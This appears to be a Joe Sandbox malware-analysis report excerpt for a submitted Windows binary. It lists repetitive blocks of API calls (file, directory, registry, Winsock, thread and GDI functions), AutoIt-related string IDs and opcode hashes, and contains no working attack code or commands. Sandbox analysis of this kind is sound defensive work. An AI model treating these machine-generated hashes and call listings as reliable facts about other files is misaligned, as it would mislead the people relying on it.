                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2326526234-1173974218
                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                    APIs
                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                    • _wcslen.LIBCMT ref: 004335F2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                    • String ID: \
                                                    • API String ID: 321622961-2967466578
                                                    • Opcode ID: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                    • Opcode Fuzzy Hash: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                    • Opcode Fuzzy Hash: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                    • _wprintf.LIBCMT ref: 004340A1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                    • __lock.LIBCMT ref: 00417981
                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                    • __lock.LIBCMT ref: 004179A2
                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                    • String ID: KERNEL32.DLL$pI
                                                    • API String ID: 637971194-197072765
                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_malloc
                                                    • String ID:
                                                    • API String ID: 1938898002-0
                                                    • Opcode ID: 91917bef2c536ceb12168598d55882ab41e7a8443872865497eea00ca1a89ee2
                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                    • Opcode Fuzzy Hash: 91917bef2c536ceb12168598d55882ab41e7a8443872865497eea00ca1a89ee2
                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                    • _memmove.LIBCMT ref: 0044B555
                                                    • _memmove.LIBCMT ref: 0044B578
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                    • String ID:
                                                    • API String ID: 2737351978-0
                                                    • Opcode ID: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                    • Opcode Fuzzy Hash: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                    • __getptd.LIBCMT ref: 00415253
                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                    • _free.LIBCMT ref: 0041529E
                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 3638380555-0
                                                    • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                    • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 3207048006-625585964
                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                    • _memmove.LIBCMT ref: 004656CA
                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                    • String ID:
                                                    • API String ID: 2945290962-0
                                                    • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                    • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                    • String ID:
                                                    • API String ID: 1457242333-0
                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                    • String ID: X
                                                    • API String ID: 780548581-3081909835
                                                    • Opcode ID: b708fa19eaf0a880b6c5a4daf0308cd987788c6395ca1e6ff0523427d9322285
                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                    • Opcode Fuzzy Hash: b708fa19eaf0a880b6c5a4daf0308cd987788c6395ca1e6ff0523427d9322285
                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
